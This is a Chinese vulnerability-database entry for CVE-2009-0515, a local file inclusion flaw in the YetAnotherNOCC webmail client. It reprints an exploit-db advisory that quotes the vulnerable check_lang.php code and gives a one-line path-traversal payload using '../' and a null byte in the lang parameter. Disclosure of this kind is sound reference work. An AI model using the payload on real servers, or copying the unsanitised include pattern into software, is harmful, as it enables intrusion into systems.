yanocc 'check_lang.php'目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117370 漏洞类型 路径遍历
发布时间 2009-02-09 更新时间 2009-02-26
CVE编号 CVE-2009-0515 CNNVD-ID CNNVD-200902-269
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/8020
https://cxsecurity.com/issue/WLB-2009020160
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-269
|漏洞详情
YetAnotherNOCC是一款免费的简单的WEB邮件客户端,支持POP3,SMTP,andIMAP等邮件协议。YetAnotherNOCC(YANOCC)0.1.0及之前版本中的check_lang.php存在目录遍历漏洞。远程攻击者可以借助lang参数中的"..",包含和运行任意的本地文件。
|漏洞EXP
Yet Another NOCC 0.1.0 <= Local File Inclusion Vulnerabilities

YANOCC is a simple and fast webmail client which can handle POP3, SMTP, and IMAP servers. 
YANOCC is based on NOCC's code and is written with PHP4. It features multi-language support, 
MIME attachments, displays HTML messages, address book, folder support.

Author: Kacper
HomePage: http://devilteam.pl/
          http://polskihacking.pl/

in file check_lang.php:

if (!ISSET($lang))
{
	$ar_lang = explode(",", $HTTP_ACCEPT_LANGUAGE);
	while ($accept_lang = array_shift($ar_lang))
	{
		$tmp = explode(";", $accept_lang);
		$tmp[0] = strtolower($tmp[0]);
		if (file_exists("lang/".$tmp[0].".php"))
		{
			$lang = $tmp[0];
			break;
		}
	}
	if ($lang == "")
		$lang = $default_lang;
}
//  Fix for faulty PHP install (RH7, see bug #24933)
$lang = trim($lang);
require ("lang/".$lang.".php");

Vuln example:

check_lang.php?lang=../[localinclude]%00


# milw0rm.com [2009-02-09]
|参考资料

来源:XF
名称:yanocc-checklang-file-include(48608)
链接:http://xforce.iss.net/xforce/xfdb/48608
来源:VUPEN
名称:ADV-2009-0383
链接:http://www.vupen.com/english/advisories/2009/0383
来源:BID
名称:33704
链接:http://www.securityfocus.com/bid/33704
来源:MILW0RM
名称:8020
链接:http://www.milw0rm.com/exploits/8020
来源:SECUNIA
名称:33862
链接:http://secunia.com/advisories/33862